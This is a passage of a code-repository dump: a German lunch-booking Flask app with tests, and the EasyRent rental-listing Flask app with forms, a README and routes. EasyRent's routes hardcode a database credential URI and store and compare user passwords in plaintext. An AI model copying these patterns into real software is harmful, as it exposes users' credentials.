protected](\"/reports/json/<end>/\")\ndef new_bookings_json_specific_end(end):\n return json.dumps(database.list_events(g.db, datetime.now().isoformat(), end))\n\[email protected](\"/reports/json/<start>/<end>/\")\ndef new_bookings_json_specific_timedelta(start, end):\n return json.dumps(database.list_events(g.db, start, end))\n\n\ndef validate(event, new=True):\n errors = {}\n\n try:\n int(event[\"slots\"])\n except ValueError:\n event[\"slots\"] = -1 # XXX: hacky?\n\n date = event[\"date\"]\n try:\n assert len(date) == 10, u\"Ungültiges Datum.\"\n if new:\n date_current = datetime.strptime(date, \"%Y-%m-%d\")\n date_now = datetime.now()\n assert date_now < date_current, u\"Datum liegt in der Vergangenheit.\"\n\n except AssertionError, e:\n errors[\"date\"] = e.message\n\n if (event[\"title\"] is None or event[\"title\"].strip() == \"\"):\n errors[\"title\"] = u\"Speisentitel fehlt.\"\n\n if new:\n prevdates = []\n for e in database.list_events(g.db):\n prevdates.append(e[\"date\"])\n\n try:\n if date in prevdates:\n errors[\"date\"] = u\"Speise an diesem Datum schon vorhanden.\"\n except:\n pass\n\n return errors\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"POST\"])\ndef handle_booking(event_id):\n date_now = datetime.now()\n date = format_date(g.db.get(\"events:%s:date\" % event_id))\n last_Friday = get_Friday(date)\n date = datetime.strptime(date, \"%Y-%m-%d\")\n late = False\n warn = False\n\n if date <= date_now:\n late = True\n if date_now > last_Friday:\n warn = True\n\n if not late and not warn:\n if request.form.get(\"_method\", \"PUT\").upper() == \"DELETE\":\n return cancel_event(event_id)\n else:\n return book_event(event_id)\n elif late:\n flash(u\"Buchungen sind nicht mehr änderbar. Bitte Anja oder einen Admin fragen, wenn trotzdem etwas geändert werden soll.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n elif warn:\n flash(u\"Achtung: Diese Buchungsänderung ist nicht vor Freitag vorgenommen worden. 
Bitte diese zeitig an Anja melden.\", \"error\")\n if request.form.get(\"_method\", \"PUT\").upper() == \"DELETE\":\n return cancel_event(event_id)\n else:\n return book_event(event_id)\n\n\[email protected](\"/admin/<event_id>/delete\", methods=[\"POST\"])\ndef delete_event(event_id):\n if database.delete_event(g.db, event_id):\n flash(u\"Löschen erfolgreich.\", \"success\")\n else:\n flash(u\"Löschen nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"admin\", page=1))\n\n\[email protected](\"/admin/events/<event_id>/edit\", methods=[\"POST\"])\ndef edit_event(event_id):\n event = database.get_event(g.db, event_id)\n event[\"date\"] = format_date(event[\"date\"])\n if event[\"slots\"] == \"-1\":\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_event.html\" %} {% endblock %}', new_event=event, e_id=event_id)\n\[email protected](\"/admin/events/<event_id>/save\", methods=[\"POST\"])\ndef save_edit_event(event_id):\n event = get_Event_from_Request(request)\n errors = validate(event, new=False)\n if (len(errors) == 0):\n database.edit_event(g.db, event_id, event)\n flash(u\"Termin erfolgreich geändert.\", \"success\")\n return redirect(url_for(\"admin\", page=1))\n else:\n for field, msg in errors.items():\n flash(msg, \"error\")\n if event[\"slots\"] == -1:\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_event.html\" %} {% endblock %}', new_event=event, e_id =event_id)\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"PUT\"])\ndef book_event(event_id):\n veg = request.form.get(\"vegetarian\")\n if database.book_event(g.db, event_id, g.current_user, vegetarian=veg):\n flash(u\"Anmeldung erfolgreich.\", \"success\")\n else:\n flash(u\"Anmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"DELETE\"])\ndef cancel_event(event_id):\n if database.cancel_event(g.db, event_id, g.current_user):\n flash(u\"Abmeldung erfolgreich.\", \"success\")\n else:\n flash(u\"Abmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n\n\[email protected](\"/admin/events/<event_id>/edit_booking\", methods=[\"POST\"])\ndef cancel_event_admin(event_id):\n a_bookings = database.get_bookings(g.db, event_id)\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_bookings.html\" %} {% endblock %}', bookings=a_bookings, e_id=event_id)\n\n\[email protected](\"/admin/events/<event_id>/edit_booking/save\", methods=[\"POST\"])\ndef cancel_event_admin_save(event_id):\n user = request.form[\"user\"]\n bookings = database.get_bookings(g.db, event_id)\n if request.form.get(\"_method\"):\n if user not in bookings:\n flash(u\"User nicht in Buchungen vorhanden\", \"error\")\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_bookings.html\" %} {% endblock %}', bookings=bookings, e_id =event_id)\n elif database.cancel_event(g.db, event_id, user):\n flash(u\"Abmeldung erfolgreich.\", \"success\")\n else:\n flash(\"Abmeldung nicht erfolgreich.\", \"error\")\n elif database.book_event(g.db, event_id, user, vegetarian=False):\n flash(u\"Anmeldung erfolgreich.\", \"success\")\n else:\n 
flash(u\"Anmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"admin\", page=1))\n\ndef get_Friday(value):\n \"\"\"\n returns the date of the friday of the previous week as an datetime object\n \"\"\"\n date = datetime.strptime(value,\"%Y-%m-%d\")\n timedel = timedelta(days=datetime.strptime(value, \"%Y-%m-%d\").weekday() + 2)\n date = date - timedel\n return date\n\ndef get_next_Monday():\n \"\"\"\n returns the date of the next Monday as an datetime object\n \"\"\"\n date_now = datetime.now();\n return date_now + timedelta(days=(7 - date_now.weekday()))\n\ndef get_Event_from_Request(request):\n event = {\n \"date\": format_date(request.form[\"date\"]),\n \"title\": request.form[\"title\"],\n \"details\": request.form[\"details\"],\n \"slots\": request.form[\"slots\"],\n \"vegetarian\": request.form.get(\"vegetarian\")\n }\n return event\n\ndef get_events_paginated(page, db):\n countpages = int(ceil(database.get_count_events(db) / MAXEVENTS))\n pages = []\n for i in range(1,countpages+1):\n pages.append(i)\n start = MAXEVENTS*(int(page)-1)\n events = database.list_events(db)\n sortedEvents = sorted(events, key=lambda k: k['date'], reverse=True)\n sortedEvents = sortedEvents[start:start+MAXEVENTS]\n return pages,sortedEvents\n\ndef format_date(value, include_weekday=False): # XXX: does not belong here\n \"\"\"\n if it's not already a date string, it converts an ISO-8601-like integer into a date string:\n 20120315 -> \"2012-03-15 (Donnerstag)\"\n \"\"\"\n\n date = value\n try:\n assert len(date) == 10\n assert date[4] == date[7] == \"-\"\n except AssertionError:\n try:\n assert len(date) == 8\n date = str(value)\n date = \"%s-%s-%s\" % (date[0:4], date[4:6], date[6:8])\n except (AssertionError, ValueError):\n return \"\"\n\n if include_weekday:\n weekday = datetime.strptime(date, \"%Y-%m-%d\").weekday()\n weekday = (u\"Montag\", u\"Dienstag\", u\"Mittwoch\", u\"Donnerstag\", u\"Freitag\",\n u\"Samstag\", u\"Sonntag\")[weekday]\n date += \" (%s)\" % weekday\n\n return date\n\n\ndef month_name(date, include_year=False):\n \"\"\"\n returns the (German) name of the month based on a ISO-8601 date string\n \"2012-03-15\" -> \"März 2012\"\n \"\"\"\n # XXX: partially duplicates `normalize_date`\n try:\n assert len(date) == 10\n assert date[4] == date[7] == \"-\"\n except (AssertionError, ValueError):\n raise ValueError(\"invalid date format\")\n\n month = datetime.strptime(date, \"%Y-%m-%d\").month - 1\n res = [u\"Januar\", u\"Februar\", u\"März\", u\"April\", u\"Mai\", u\"Juni\", u\"Juli\",\n u\"August\", u\"September\", u\"Oktober\", u\"November\", u\"Dezember\"][month]\n\n if include_year:\n res += str(datetime.strptime(date, \"%Y-%m-%d\").year)\n\n return res\n\n\ndef normalize_date(value): # XXX: does not belong here\n \"\"\"\n converts an ISO-8601 date string into an integer:\n \"2012-03-15\" -> 20120315\n\n raises ValueError if date format is not ISO-8601\n \"\"\"\n try:\n assert len(value) == 10\n assert value[4] == value[7] == \"-\"\n date = int(value.replace(\"-\", \"\"))\n except (AssertionError, ValueError):\n raise ValueError(\"invalid date format\")\n return date\n\napp.jinja_env.filters[\"format_date\"] = format_date # XXX: does not belong here!\n"
},
{
"alpha_fraction": 0.5213435888290405,
"alphanum_fraction": 0.5342897176742554,
"avg_line_length": 32.23255920410156,
"blob_id": "8a332b10048b1001a9bf4b27d92117ea7e26ba2e",
"content_id": "0410bfe82c1f4e49a371d6ab7f88fb4d3adff442",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2860,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 86,
"path": "/test/test_events.py",
"repo_name": "hhagmans/mittach",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nimport os, sys, unittest\n\nos.environ[\"MITTACH_CONFIG_MODE\"] = \"testing\"\nsys.path.append(\"/Users/hendrik11/Documents/innoq_mittach\")\nfrom mittach.web import app, database\nfrom flask import Flask, g\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n assert app.config[\"MODE\"] == \"testing\"\n # reset database\n self.db = database.connect(app.config)\n self.db.flushall()\n self.app = app.test_client()\n\n\n# def tearDown(self):\n# os.close(self.db)\n# os.unlink(mittach.DATABASE)\n\n def test_creation(self):\n data = { \"title\": \"FooBar\", \"details\": \"\", \"date\": \"2012:03:10\",\n \"slots\": 3, \"vegetarian\": True }\n\n assert database.create_event(self.db, data) == 1\n\n def test_event_list(self):\n defaults = { \"details\": \"\", \"date\": 0, \"vegetarian\": False }\n for i, data in enumerate([{ \"title\": \"Foo\", \"slots\": 1 },\n { \"title\": \"Bar\", \"slots\": 2, \"vegetarian\": True },\n { \"title\": \"Baz\", \"slots\": 3 }]):\n _data = {}\n _data.update(defaults)\n _data.update(data)\n database.create_event(self.db, _data)\n\n events = database.list_events(self.db)\n assert len(events) == 3\n assert [\"Baz\", \"Bar\", \"Foo\"] == [event[\"title\"] for event in events]\n\n def test_admin(self):\n\n with app.test_request_context():\n rv = self.app.get('/events/1')\n print rv.data\n assert u'Admin' in rv.data\n\nif __name__ == '__main__':\n unittest.main()\n\n#class Test(object):\n#\n# def setup_method(self, method):\n# assert app.config[\"MODE\"] == \"testing\"\n# # reset database\n# self.db = database.connect(app.config)\n# self.db.flushall()\n#\n# def test_creation(self):\n# data = { \"title\": \"FooBar\", \"details\": \"\", \"date\": \"2012:03:10\",\n# \"slots\": 3, \"vegetarian\": True }\n# try:\n# assert database.create_event(self.db, data) == 1\n# print \"Test 1 success\"\n# except AssertionError:\n# print \"Test 1 failed\"\n#\n# def test_event_list(self):\n# defaults = { \"details\": \"\", \"date\": 0, \"vegetarian\": False }\n# for i, data in enumerate([{ \"title\": \"Foo\", \"slots\": 1 },\n# { \"title\": \"Bar\", \"slots\": 2, \"vegetarian\": True },\n# { \"title\": \"Baz\", \"slots\": 3 }]):\n# _data = {}\n# _data.update(defaults)\n# _data.update(data)\n# database.create_event(self.db, _data)\n#\n# events = database.list_events(self.db)\n# assert len(events) == 3\n# assert [\"Baz\", \"Bar\", \"Foo\"] == [event[\"title\"] for event in events]\n#\n# def test_admin(self):\n# rv = self.app.get('/admin/1')\n# assert u'Du besitzt nicht die benötigten Rechte für diese Seite.' in rv.data\n"
}
] | 2 |
Jason003/EasyRent | https://github.com/Jason003/EasyRent | 4a15af4cd23a602ad90224a40702cc3935e4a4fa | f05c64b94e63b72e9ac4d7169003347cc1e8bb1d | 5d5c33edeabf0ef7da62ab4308b0f3fc5a69ae0b | refs/heads/master | 2020-09-07T13:53:12.363354 | 2019-11-10T21:18:07 | 2019-11-10T21:18:07 | 220,801,933 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.72743159532547,
"alphanum_fraction": 0.72743159532547,
"avg_line_length": 36.30434799194336,
"blob_id": "e41e2e1014d67277d793e0baf1798c8c2f442a12",
"content_id": "e89aa5b19915324f69e5b88d384d1d2a2d32297b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1717,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 46,
"path": "/app/forms.py",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, TextAreaField, DateField, SelectField\nfrom wtforms.validators import DataRequired\nfrom flask_admin.form.widgets import DatePickerWidget\n\n\nclass LoginForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n submit = SubmitField('Sign In')\n\n\nclass RegisterForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n submit = SubmitField('Register')\n\n\nclass InquireForm(FlaskForm):\n message = TextAreaField('Message', validators=[DataRequired()])\n submit = SubmitField('Send')\n\n\nclass LeaseForm(FlaskForm):\n start_date = DateField('Start Date', validators=[DataRequired()], format='%Y/%m/%d', widget=DatePickerWidget())\n end_date = DateField('End Date', validators=[DataRequired()], format='%Y/%m/%d', widget=DatePickerWidget())\n submit = SubmitField('Sign')\n\n\nclass CommentForm(FlaskForm):\n comment = TextAreaField('Comment', validators=[DataRequired()])\n submit = SubmitField('Comment')\n\n\nclass StudentVerifyForm(FlaskForm):\n university = StringField('University', validators=[DataRequired()])\n student_id = StringField('Student ID', validators=[DataRequired()])\n submit = SubmitField('Verify')\n\nclass FilterForm(FlaskForm):\n key_word = StringField('Key Word & Location')\n price = StringField('Less than')\n bedrooms = StringField('Bedrooms')\n bathrooms = StringField('Bathrooms')\n submit = SubmitField('Search')\n\n"
},
{
"alpha_fraction": 0.7530080080032349,
"alphanum_fraction": 0.778743326663971,
"avg_line_length": 72.85185241699219,
"blob_id": "4965c51576af12d45c766f5b8e57da3894472b2d",
"content_id": "ba02fb8de09f5c95a6d65896cfd9a9adc4ee9c4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5984,
"license_type": "no_license",
"max_line_length": 654,
"num_lines": 81,
"path": "/README.md",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "# Easy Renter\n\nEasyRenter is a house renting platform which provides services including inquiry sending, lease signing, multi-conditional search and comments.\n\n## Basic Infomation\n### Group Member\n```\nJiefan Li <jl5501>\nYuyao Zhong <yz3618>\n```\n### PostgreSql account\n```\nJL5501\n```\n### URL of Web Application\n\n[http://34.74.195.72:8111/](http://34.74.195.72:8111/) \n\n## Description\n\nThe website includes all the functions mentioned in the part 1, with 7 entities and database set up in the part 2.\n\n### Users\nUsers can create an account by clicking the \"Register\" button on the top right at the home page. A user needs to fill in the infomation of Username, Email and Password. After registering, users can log in by clicking the \"Login\" button on the top right of the page, where username and password are required. If password does match, the users can not login. After log in, a user can check his or her basic infomation on the personal web page, which can be entered by clicking the username displayed on the top right at the home page.\n\n### Apartments\nThe infomation of the apartments is listed on the home page, with clear titles show the addresses of the apartments. By clicking each titles, the detailed infomation of the apartments will be displayed, including price, the number of bedrroms and bathrooms, description, and the responsible brokers. The comments on the apartment are also shown on the page.\n\n### Comments\nUsers can post comments in the web page of an apartment by click the \"Post Comment\" button next to the title of \"Comments\". Before posting a comment, users must log in first. If a user does not log in but press the \"Post Comment\", the webpage will be redirected to the Log-In page.\n\n### Brokers\n\nOn an apartment list, the name of the broker who is responsible for the apartment will be displayed.\n\n### Inquiries\nOn each apartment list, users can send inquiries to the responsible broker by clicking the \"Inquire\" button next to the name of the broker. On the Inquiry page, users need to fill in the message, and click \"Send\" button to send the message. After sending the inquiry, users can get their history records of sent inquiries in their personal webpages.\n\n### Lease Signing\nUsers can choose to sign a lease on an apartment by clicking the \"Sign Lease\" button on the page of the apartement. Users need to choose the start date and end date for their leases. After signing a lease, the history records of signed leases can also be quiried on the personal webpages.\n\n### Student\nA user can verify to be a student on his or her personal web page by clicking \"Student Verification\" next to the user name. After entering the university and student ID, the account will be come a student account. After verification, the user will be redirected to the personal webpage with notice of \"Successfully Verified\", and the user will also be marked as \"Student\" next to the user name.\n\n## Interesting Operations\n### Multi-conditional Search\nAt the home page, users can query by key words and location, the boundary of the price, and the numbers of bedrooms and bathrooms, which can help users decrease the range to search ideal apartments. Users do not need to fill all the blanks but instead only choose the conditions they want to add. The conditions that are not empty will be stored to the corresponding variables, then combining together to form a SQL query which includes all the conditions through string concatenation. 
The result of the query will be sent back and displayed on the webpage, with a list of apartments that satisfy the conditions, or empty if no apartments meet the needs.\n\nFor example, by inputing following infomation:\n```\nKey Word & Location: 362\nLess than: $10000\n```\nwhere leaves the conditions of bedrooms and bathrooms empty, the page will then display a list with an apartment that meets the condition:\n```\n362 W 119th St APT 2, New York, NY 10026\n```\nUsers can then click the title to know more details about the apartments.\nIt is an interesting part because it is useful in practice, which enables users to narrow down their search. It also makes SQL queries flexible, since we do not need to fill all the blank to send a query.\n\n### The apartment webpages\nThe apartment webpages are used to display the detailed information, descriptions, the related brokers and the comments. To get the comprehensive components, we need to make queries among not only the apartment table, but also the broker and user tables, with apartment id as the input. \n\nThe users can input data to the database through inquiries and comments. When users make inquiries, we also need to insert the records of inquiries to the inquiry table in the database. To post comments, firstly it will be checked whether a user has logged in, or he or she will be directed to the log-in page. Then a user will be directed to the comment page which allows them to enter comments after clicking the button. After posting, users will be redirected to the previous apartment webpage and see their comments.\nFor example, for the apartment of \"963 Amsterdam Ave APT 6, New York, NY 10025\" and a virtual user with name as \"test11\", before posting comments, the comment part will shows:\n```\n2r1rcgd (2019-05-07 02:01:00) : The location is amazing!\n\n8g46he (2019-03-21 15:48:00) : Very good location!\n```\nAfter the user post a comment with content *\"Comment just for showing an example\"*, the comment part of the apartment will become:\n```\ntest11 (2019-11-07 20:43:48) : Comment just for showing an example\n\n2r1rcgd (2019-05-07 02:01:00) : The location is amazing!\n\n8g46he (2019-03-21 15:48:00) : Very good location!\n```\nwhich displays the latest comment on the first row.\n\nIt is also an interesting part, because it includes comprehensive SQL queries that are related to several entities including apartments, users, brokers and comments. Users can also make insertion to the databases by sending inquiries and comments and to see their comments as soon as they make a post.\n\n\n"
},
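Note: the multi-conditional search described in the README above builds one SQL string by conditionally appending parameterized fragments. The sketch below illustrates that pattern in isolation; the function and parameter names (`build_filter_query`, `max_price`) are illustrative, not taken from the EasyRent code, whose full Flask version appears in the routes.py record that follows.

```python
def build_filter_query(key_word=None, max_price=None, bedrooms=None):
    # Start from an always-true base clause so fragments can be appended uniformly.
    sql = "SELECT * FROM apartments WHERE 1 = 1"
    params = {}
    if key_word:
        sql += " AND (description LIKE :kw OR address LIKE :kw)"
        params["kw"] = f"%{key_word}%"
    if max_price is not None:
        sql += " AND price <= :max_price"
        params["max_price"] = max_price
    if bedrooms is not None:
        sql += " AND bedrooms = :bedrooms"
        params["bedrooms"] = bedrooms
    return sql, params

# Example from the README: keyword "362", price at most $10000.
print(build_filter_query(key_word="362", max_price=10000))
```

Binding values through the params dict rather than concatenating them into the string keeps the flexible query safe from SQL injection.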
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8285714387893677,
"avg_line_length": 17,
"blob_id": "e0e3ae81c16484dcd767fa145b7e6658f268f9bb",
"content_id": "211f51c6c81c8e9212490ccf32b87fe89aebcc5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/.flaskenv",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "FLASK_APP=easyrent.py\nFLASK_DEBUG=1"
},
{
"alpha_fraction": 0.606812059879303,
"alphanum_fraction": 0.609417200088501,
"avg_line_length": 39.015445709228516,
"blob_id": "33466210eaf16373ae30f70e5317401544165f8a",
"content_id": "e6f880bfc5d8d46f7614b24e257933955ba5b5df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10364,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 259,
"path": "/app/routes.py",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "from app import app\nfrom flask import render_template, flash, redirect, url_for, g, session\nfrom sqlalchemy import *\nfrom app.forms import *\nimport uuid\nimport datetime\n\nDATABASEURI = \"postgresql://jl5501:[email protected]/proj1part2\"\nengine = create_engine(DATABASEURI)\n\n\[email protected]_request\ndef before_request():\n \"\"\"\n This function is run at the beginning of every web request\n (every time you enter an address in the web browser).\n We use it to setup a database connection that can be used throughout the request.\n\n The variable g is globally accessible.\n \"\"\"\n try:\n g.conn = engine.connect()\n print('Connected to database')\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback;\n traceback.print_exc()\n g.conn = None\n\n\[email protected]_request\ndef teardown_request(exception):\n \"\"\"\n At the end of the web request, this makes sure to close the database connection.\n If you don't, the database could run out of memory!\n \"\"\"\n try:\n g.conn.close()\n except Exception as e:\n pass\n\n\[email protected]('/')\[email protected]('/index', methods=['GET', 'POST'])\ndef index():\n form = FilterForm()\n SQL = 'SELECT * FROM apartments where 1 = 1 '\n d = {}\n if form.submit():\n key_word = form.key_word.data\n if key_word:\n SQL += ' and (description like :key_word or address like :key_word) '\n d['key_word'] = '%' + key_word + '%'\n lessThan = form.price.data\n if lessThan:\n try:\n lessThan = int(lessThan)\n SQL += ' and price <= :lessThan'\n d['lessThan'] = lessThan\n except:\n flash('Less than should be a number')\n bedrooms = form.bedrooms.data\n if bedrooms:\n try:\n bedrooms = int(bedrooms)\n SQL += ' and bedrooms = :bedrooms'\n d['bedrooms'] = bedrooms\n except:\n flash('Bedrooms should be a number')\n bathrooms = form.bathrooms.data\n if bathrooms:\n try:\n bathrooms = int(bathrooms)\n SQL += ' and bathrooms = :bathrooms'\n d['bathrooms'] = bathrooms\n except:\n flash('Bathrooms should be a number')\n cursor = g.conn.execute(text(SQL), d)\n apartments = cursor.fetchall()\n cursor.close()\n return render_template('index.html', apartments=apartments, form=form)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n cursor = g.conn.execute(text('select * from users where username = :username and password = :password'),\n {'username': form.username.data, 'password': form.password.data})\n user = cursor.fetchall()\n if len(user) == 0:\n flash('Incorrect Username or Password!')\n return render_template('login.html', title='Sign In', form=form)\n flash('Welcome back, {}!'.format(\n form.username.data))\n user = user[0]\n session['user_id'] = user[0]\n session['user_name'] = user[1]\n session['user_email'] = user[2]\n cursor = g.conn.execute(text('select * from students where user_id = :user_id'), {'user_id': user[0]})\n student = cursor.fetchall()\n if student and len(student):\n session['is_student'] = True\n else:\n session['is_student'] = False\n return redirect(url_for('index'))\n return render_template('login.html', title='Sign In', form=form)\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n g.conn.execute(text('''\nINSERT INTO users VALUES (:id, :username, :email, :password)\n'''), {'id': str(uuid.uuid1()), 'username': form.username.data, 'email': form.email.data,\n 'password': form.password.data})\n return redirect(url_for('login'))\n return 
render_template('register.html', title='Register', form=form)\n\n\[email protected]('/logout')\ndef logout():\n session.pop('user_id', None)\n session.pop('user_name', None)\n session.pop('user_email', None)\n session.pop('is_student', None)\n return redirect(url_for('index'))\n\n\[email protected]('/apartment/<apartment_id>')\ndef apartment(apartment_id):\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n cursor = g.conn.execute(text(\n \"SELECT * FROM comments c, users u where c.apartment_id = :apartment_id and c.user_id = u.user_id order by c.time desc\"),\n {'apartment_id': apartment_id})\n comments = cursor.fetchall()\n cursor.close()\n return render_template('apartment.html', apt=apartment, comments=comments)\n\n\[email protected]('/inquire/<apartment_id>', methods=['GET', 'POST'])\ndef inquire(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = InquireForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n message = form.message.data\n cursor = g.conn.execute(\n text('insert into inquiries values (:inquiry_id, :user_id, :broker_id, :apartment_id, :content, :time)'),\n {'inquiry_id': str(uuid.uuid1()), 'user_id': session['user_id'], 'broker_id': apartment.broker_id,\n 'apartment_id': apartment.apartment_id, 'content': message,\n 'time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")})\n flash('Message Sent!')\n cursor.close()\n return redirect(url_for('index'))\n cursor.close()\n print(apartment)\n return render_template('inquire.html', apt=apartment, form=form)\n\n\[email protected]('/lease/<apartment_id>', methods=['GET', 'POST'])\ndef lease(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = LeaseForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n cursor = g.conn.execute(\n text('insert into signedleases values (:lease_id, :user_id, :apartment_id, :start_date, :end_date)'),\n {'lease_id': str(uuid.uuid1()), 'user_id': session['user_id'],\n 'apartment_id': apartment.apartment_id, 'start_date': form.start_date.data.strftime(\"%Y-%m-%d %H:%M\"),\n 'end_date': form.end_date.data.strftime(\"%Y-%m-%d %H:%M\")})\n flash('Lease Signed!')\n cursor.close()\n return redirect(url_for('index'))\n cursor.close()\n print(apartment)\n return render_template('lease.html', apt=apartment, form=form)\n\n\[email protected]('/comment/<apartment_id>', methods=['GET', 'POST'])\ndef comment(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = CommentForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n comment = form.comment.data\n cursor = g.conn.execute(\n text('insert into comments values (:comment_id, :user_id, :apartment_id, :content, :time)'),\n {'comment_id': str(uuid.uuid1()), 'user_id': 
session['user_id'],\n 'apartment_id': apartment.apartment_id, 'content': comment,\n 'time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")})\n flash('Comment Posted!')\n cursor.close()\n return redirect(url_for('apartment', apartment_id=apartment_id))\n cursor.close()\n return render_template('comment.html', apt=apartment, form=form)\n\n\[email protected]('/dashboard/<user_id>', methods=['GET', 'POST'])\ndef dashboard(user_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n cursor = g.conn.execute(text(\n \"SELECT * FROM inquiries i, apartments a where i.apartment_id = a.apartment_id and i.user_id = :user_id\"),\n {'user_id': session['user_id']})\n inquiries = cursor.fetchall()\n cursor = g.conn.execute(text(\n \"SELECT * FROM signedleases s, apartments a where s.apartment_id = a.apartment_id and s.user_id = :user_id\"),\n {'user_id': session['user_id']})\n leases = cursor.fetchall()\n cursor.close()\n return render_template('dashboard.html', inquiries=inquiries, leases=leases)\n\n\[email protected]('/student_verify/<user_id>', methods=['GET', 'POST'])\ndef student_verify(user_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n if session['is_student']:\n flash('You have been verified!')\n return redirect(url_for('dashboard', user_id=user_id))\n form = StudentVerifyForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM users where user_id = :user_id\"), {'user_id': user_id})\n user = cursor.fetchone()\n if form.validate_on_submit():\n cursor = g.conn.execute(\n text('select * from students where university = :university and student_id = :student_id'),\n {'university': form.university.data, 'student_id': form.student_id.data})\n currentStudent = cursor.fetchall()\n if currentStudent and len(currentStudent):\n flash('This Student Has been Verified!')\n return redirect(url_for('student_verify', user_id=user_id))\n cursor = g.conn.execute(\n text('insert into students values (:user_id, :university, :student_id)'),\n {'user_id': session['user_id'],\n 'university': form.university.data, 'student_id': form.student_id.data})\n flash('Successfully Verified!')\n session['is_student'] = True\n cursor.close()\n return redirect(url_for('dashboard', user_id=user_id))\n cursor.close()\n return render_template('student_verify.html', form=form, user=user)\n"
}
] | 4 |
almajeas/CS229ML | https://github.com/almajeas/CS229ML | 7f64c9d0584a46c476329c43e894cea119c03274 | 14cadc2b819c12da99e83b29d4cbf32cb57d0ebf | 1950e4939e8371ad8592e49ece920a38dc0104be | refs/heads/master | 2021-01-03T07:59:47.396465 | 2020-05-15T10:47:42 | 2020-05-15T10:47:42 | 239,991,310 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5570498704910278,
"alphanum_fraction": 0.5746203660964966,
"avg_line_length": 24.74860382080078,
"blob_id": "06d927a3d26d9e8aaf225ff4b14e461ac0c44cf6",
"content_id": "2d4a897403a3e7a554824020d6711fa5da2b1048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4610,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 179,
"path": "/HW1/hw1.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
